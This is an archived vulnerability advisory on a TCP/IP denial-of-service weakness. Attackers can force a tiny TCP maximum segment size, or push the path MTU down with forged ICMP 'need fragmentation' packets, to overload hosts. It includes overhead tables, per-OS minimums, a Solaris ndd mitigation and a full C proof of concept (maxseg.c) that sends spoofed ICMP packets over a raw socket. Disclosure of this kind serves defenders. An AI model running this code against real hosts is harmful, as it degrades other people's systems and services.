TUCoPS :: Unix :: General :: tcpip2.htm

TUCoPS :: Unix :: General :: tcpip2.htm
TCP/IP packetstorm
Vulnerability
 TCP/IP
Affected
 most systems
Description
 Darren Reed found following. On a lan far far away, a rouge
 packet was heading towards a server, ready to start up a new
 storm ...
 If any of you have tested what happens to the ability of a box to
 perform well when it has a small MTU you will know that setting
 the MTU to (say) 56 on a diskless thing is a VERY VERY bad idea
 when NFS read/write packets are generally 8k in size. Do not try
 it on a NFS thing unless you plan to reboot it, ok ? Last time
 Darren did this was when he worked out you could fragment packets
 inside the TCP header and that lesson was enough for him.
 Following on from this, it occurs to me that the problem with the
 above can possibly be reproduced with TCP. How? That thing
 called "maximum segment size". The problem? Well, the first is
 that there does not appear to be a minimum. The second is that
 it is negoiated by the caller, not callee. Did we hear someone
 say "oh dear"?
 What's this mean? Well, if we connect to www.microsoft.com and
 set our MSS to 143 (say), they need to send us 11 packets for
 every one they would normally send us (with an MSS of 1436).
 Total output for them is 1876 bytes - a 30% increase. However,
 that's not the real problem. Our experience is that hosts,
 especially PC's, have a lot of trouble handling *LOTS* of
 interrupts. To send 2k out via the network, it's no longer 2
 packets but 20+ - a significant increase in the workload.
 A quick table (based on 20byte IP & TCP header):
 datalen mss packets total bytes bytes %increase
 1436 1436 1 1476 0
 1436 1024 2 1516 3%
 1436 768 2 1516 3%
 1436 512 3 1556 5%
 1436 256 6 1676 13%
 1436 128 12 1916 30%
 1436 64 23 2356 69%
 1436 32 45 3236 119%
 1426 28 52 3516 238% (MTU = 68)
 1436 16 90 5036 241%
 1436 8 180 8636 485%
 1436 1 1436 58876 3989%
 For Solaris, you can enforce a more sane minimum MSS than the
 install default (1) with ndd:
 ndd -set /dev/tcp tcp_mss_min 128
 HP-UX 11.* is in the same basket as Solaris.
 *BSD have varying minimums well above 1 - NetBSD at 32, FreeBSD
 at 64. (OpenBSD's comment on this says 32 but the code says 64).
 Linux 2.4 is 88
 We can't see anything in the registry or MSDN which says what it
 is for Windows. By experimentation, Win2000 appears to be 88,
 NT 4 appears to be 1
 Nothing else besides Solaris seems to have anything close to a
 reasonable manner in which to tune the minimum value. What's most
 surprising is that there does not appear to be a documented
 minimum, just as there is no "minimum MTU" size for IP. If there
 is, please correct us.
 About the only bonus to this is that there does not appear to be
 an easy way to affect the MSS sent in the initial SYN packet.
 Oh, so how's this a potential denial of service attack? Generally
 network efficiency comes through sending lots of large packets...
 but don't tell ATM folks that, of course. Does it work? *shrug*
 It is not easy to test...the only testing Darren could do (with
 NetBSD) was to use the TCP_MAXSEG setsockopt BUT this only affects
 the sending MSS (now what use is that?), but in testing, changing
 it from the default 1460 to 1 caused number of packets to go from
 9 to 2260 to write 1436 bytes of data to discard. To send 100 *
 1436 from the NetBSD box to Solaris8 took 60 seconds (MSS of 1)
 vs ~1 with an MSS of 1460. Of even more significance, one
 connection like this made almost no difference after the first
 run but running a second saw kernel CPU jump to 30% on an SS20/712
 (we suspect there are some serious TCP tuning happening
 dynamically). The sending host was likewise afflicted with a
 signifcant CPU usage penalty if more than one was running. There
 were some very surprising things happening too - with just one
 session active, ~170-200pps were seen with netstat on Solaris,
 but with the second, it was between 1750 and 1850pps. Can you
 say "ACK storm"? Oh, and for fun you can enable TCP timestamping
 just to make those headers bigger and run the system a bit harder
 whilst processing packets!
 Darren didn't investigated the impact of ICMP PMTU discovery, but
 from his reading of at least the BSD source code, the MTU for the
 route will be ignored if it is less than the default MSS when
 sending out the TCP SYN with the MSS option. That aside, it will
 still impact current connections and would appear to be a way to
 force the _current_ MSS below that set at connect time. On BSD,
 it will not accept PMTU updates if the MTU is less than 296, on
 Solaris8 and Linux 2.4 it just needs to be above 68 (hmmm, allows
 you to get an effective MSS of less than 88).
 /*
 * (C)Copyright 2001 Darren Reed.
 *
 * maxseg.c
 */
 #include <sys/types.h>
 #include <sys/param.h>
 #include <sys/socket.h>
 #if BSD>= 199306
 #include <sys/sysctl.h>
 #endif
 
 #include <netinet/in.h>
 #include <netinet/in_systm.h>
 #include <netinet/ip.h>
 #include <netinet/ip_icmp.h>
 #include <netinet/ip_var.h>
 #include <netinet/tcp.h>
 #include <netinet/tcp_timer.h>
 #include <netinet/tcp_var.h>
 
 #include <time.h>
 #include <fcntl.h>
 #include <errno.h>
 
 void prepare_icmp(struct sockaddr_in *);
 void primedefaultmss(int, int);
 u_short in_cksum(u_short *, int);
 int icmp_unreach(struct sockaddr_in *, struct sockaddr_in *);
 
 
 #define	NEW_MSS	512
 #define	NEW_MTU	1500
 static int start_mtu = NEW_MTU;
 
 void primedefaultmss(fd, mss)
 int fd, mss;
 {
 #ifdef __NetBSD__
	 static int defaultmss = 0;
	 int mib[4], msso, mssn;
	 size_t olen;
 
	 if (mss == 0)
		 mss = defaultmss;
	 mssn = mss;
	 olen = sizeof(msso);
 
	 mib[0] = CTL_NET;
	 mib[1] = AF_INET;
	 mib[2] = IPPROTO_TCP;
	 mib[3] = TCPCTL_MSSDFLT;
	 if (sysctl(mib, 4, &msso, &olen, NULL, 0))
		 err(1, "sysctl");
	 if (defaultmss == 0)
		 defaultmss = msso;
 
	 if (sysctl(mib, 4, 0, NULL, &mssn, sizeof(mssn)))
		 err(1, "sysctl");
 
	 if (sysctl(mib, 4, &mssn, &olen, NULL, 0))
		 err(1, "sysctl");
 
	 printf("Default MSS: old %d new %d\n", msso, mssn);
 #endif
 
 #if HACKED_KERNEL
	 int opt;
 
	 if (mss)
		 op = mss;
	 else
		 op = 512;
	 if (setsockopt(fd, IPPROTO_TCP, TCP_MAXSEG+1, (char *)&op, sizeof(op)))
		 err(1, "setsockopt");
 #endif
 }
 
 
 int
 main(int argc, char *argv[])
 {
	 struct sockaddr_in me, them;
	 int fd, op, olen, mss;
	 char prebuf[16374];
	 time_t now1, now2;
	 struct timeval tv;
 
	 mss = NEW_MSS;
 
	 primedefaultmss(-1, mss);
 
	 fd = socket(AF_INET, SOCK_STREAM, 0);
	 if (fd == -1)
		 err(1, "socket");
 
	 memset((char *)&them, 0, sizeof(me));
	 them.sin_family = AF_INET;
	 them.sin_port = ntohs(atoi(argv[2]));
	 them.sin_addr.s_addr = inet_addr(argv[1]);
 
	 primedefaultmss(fd, mss);
 
	 op = fcntl(fd, F_GETFL, 0);
	 if (op != -1) {
		 op |= O_NONBLOCK;
		 fcntl(fd, F_SETFL, op);
	 }
 
	 op = 1;
	 (void) setsockopt(fd, SOL_SOCKET, TCP_NODELAY, &op, sizeof(op));
 
	 if (connect(fd, (struct sockaddr *)&them, sizeof(them)) &&
	 (errno != EINPROGRESS))
		 err(1, "connect");
 
	 olen = sizeof(op);
	 if (!getsockopt(fd, IPPROTO_TCP, TCP_MAXSEG, (char *)&op, &olen))
		 printf("Remote mss %d\n", op);
	 else
		 err(1, "getsockopt");
 
 #if HACKED_KERNEL
	 olen = sizeof(op);
	 if (!getsockopt(fd, IPPROTO_TCP, TCP_MAXSEG+1, (char *)&op, &olen))
		 printf("Our mss %d\n", op);
	 else
		 err(1, "getsockopt(+1)");
 #endif
 
	 olen = sizeof(me);
	 if (getsockname(fd, (struct sockaddr *)&me, &olen))
		 err(1, "getsockname");
 
	 (void) read(fd, prebuf, sizeof(prebuf));
 
	 now1 = time(NULL);
	 for (op = 2; op; op--) {
		 icmp_unreach(&me, &them);
		 olen = read(fd, prebuf, sizeof(prebuf));
		 if (olen == -1) {
			 if (errno == ENOBUFS || errno == EAGAIN ||
			 errno == EWOULDBLOCK) {
				 tv.tv_sec = 0;
				 tv.tv_usec = 10000;
				 select(3, NULL, NULL, NULL, &tv);
				 continue;
			 }
			 warn("read");
			 break;
		 }
	 }
	 now2 = time(NULL);
	 printf("Elapsed time %d\n", now2 - now1);
 
	 primedefaultmss(fd, 0);
	 close(fd);
	 return 0;
 }
 
 
 /*
 * in_cksum() & icmp_unreach() ripped from nuke.c prior to modifying
 */
 static char icmpbuf[256];
 static int icmpsock = -1;
 static struct sockaddr_in destsock;
 
 void
 prepare_icmp(dst)
	 struct sockaddr_in *dst;
 {
	 struct tcphdr *tcp;
	 struct icmp *icmp;
 
	 icmp = (struct icmp *)icmpbuf;
 
	 if (icmpsock == -1) {
 
		 memset((char *)&destsock, 0, sizeof(destsock));
		 destsock.sin_family = AF_INET;
		 destsock.sin_addr = dst->sin_addr;
 
		 srand(getpid());
 
		 icmpsock = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP);
		 if (icmpsock == -1)
			 err(1, "socket");
 
		 /* the following messy stuff from Adam Glass (icmpsquish.c) */
		 memset(icmp, 0, sizeof(struct icmp) + 8);
		 icmp->icmp_type = ICMP_UNREACH;
		 icmp->icmp_code = ICMP_UNREACH_NEEDFRAG;
		 icmp->icmp_pmvoid = 0;
 
		 icmp->icmp_ip.ip_v = IPVERSION;
		 icmp->icmp_ip.ip_hl = 5;
		 icmp->icmp_ip.ip_len = htons(NEW_MSS);
		 icmp->icmp_ip.ip_p = IPPROTO_TCP;
		 icmp->icmp_ip.ip_off = htons(IP_DF);
		 icmp->icmp_ip.ip_ttl = 11 + (rand() % 50);
		 icmp->icmp_ip.ip_id = rand() & 0xffff;
 
		 icmp->icmp_ip.ip_src = dst->sin_addr;
 
		 tcp = (struct tcphdr *)(&icmp->icmp_ip + 1);
		 tcp->th_sport = dst->sin_port;
	 }
	 icmp->icmp_nextmtu = htons(start_mtu);
	 icmp->icmp_cksum = 0;
 }
 
 
 u_short
 in_cksum(addr, len)
 u_short *addr;
 int len;
 {
	 register int nleft = len;
	 register u_short *w = addr;
	 register int sum = 0;
	 u_short answer = 0;
 
	 /*
	 * Our algorithm is simple, using a 32 bit accumulator (sum),
	 * we add sequential 16 bit words to it, and at the end, fold
	 * back all the carry bits from the top 16 bits into the lower
	 * 16 bits.
	 */
	 while( nleft> 1 ) {
	 sum += *w++;
	 nleft -= 2;
	 }
 
	 /* mop up an odd byte, if necessary */
	 if( nleft == 1 ) {
	 *(u_char *)(&answer) = *(u_char *)w ;
	 sum += answer;
	 }
 
	 /*
	 * add back carry outs from top 16 bits to low 16 bits
	 */
	 sum = (sum>> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
	 sum += (sum>> 16); /* add carry */
	 answer = ~sum; /* truncate to 16 bits */
	 return (answer);
 }
 
 int icmp_unreach(src, dst)
	 struct sockaddr_in *src, *dst;
 {
	 static int donecksum = 0;
	 struct sockaddr_in dest;
	 struct tcphdr *tcp;
	 struct icmp *icmp;
	 int i, rc;
	 u_short sum;
 
	 icmp = (struct icmp *)icmpbuf;
 
	 prepare_icmp(dst);
 
	 icmp->icmp_ip.ip_dst = src->sin_addr;
 
	 sum = in_cksum((u_short *)&icmp->icmp_ip, sizeof(struct ip));
	 icmp->icmp_ip.ip_sum = sum;
 
	 tcp = (struct tcphdr *)(&icmp->icmp_ip + 1);
	 tcp->th_dport = src->sin_port;
 
	 sum = in_cksum((u_short *)icmp, sizeof(struct icmp) + 8);
	 icmp->icmp_cksum = sum;
	 start_mtu /= 2;
	 if (start_mtu < 69)
		 start_mtu = 69;
 
	 i = sendto(icmpsock, icmpbuf, sizeof(struct icmp) + 8, 0,
		 (struct sockaddr *)&destsock, sizeof(destsock));
	 if (i == -1 && errno != ENOBUFS && errno != EAGAIN &&
	 errno != EWOULDBLOCK)
		 err(1, "sendto");
	 return(0);
 }
 Some people are not understanding the difference between the TCP
 MSS and IP's MTU. Either that or both you and David LeBlanc are
 grasping at straws in order to make WindowsNT look better.
 MTU and Path MTU (PMTU) discovery are not the same as TCP's MSS
 but they can and do impact it.
 Darren managed to get NT4.0 (workstation) to accept a TCP MSS of 1
 (sent lots of data packets out that had 1 byte of data) and he
 got Win2000 to accept an MTU of 69 (effective MSS of 17 after TCP
 options) through PMTU discovery. Now, if 20+68 is the reason why
 88 is the minimum MSS Win2000 will accept then someone doesn't
 understand what the word "MTU" means because it referes to the
 TOTAL IP datagram length, not the data part.
 Using the C program above one is able to get Win2000 to create a
 MTU specific path to a local box where the MTU was 69. That's
 well under any number over 500 (depending on how you choose to
 see the value).
 Path MTU discovery has absolutely no interaction with the TCP MSS
 except that one would expect it to be used if a cached path
 already existed to a host, with an MTU specific for it set, when
 initiating or accepting a new TCP connection.
Solution
 Quite clearly the host operating system needs to set a much more
 sane minimum MSS than 1. Given there is no minimum MTU for IP -
 well, maybe "68" - it's hard to derive what it should be.
 Anything below 40 should just be banned (that's the point at which
 you're transmitting 50% data, 50% headers). Most of the defaults,
 above, are chosen because it fits in well with their internal
 network buffering (some use a default MSS of 512 rather than
 536 for similar reasons). But above that, what do you choose? 80
 for a 25/75 or something higher still? Whatever the choice and
 however it is calculated, it is not enough to just enforce it
 when the MSS option is received. It also needs to be enforced
 when the MTU parameter is checked in ICMP "need frag" packets.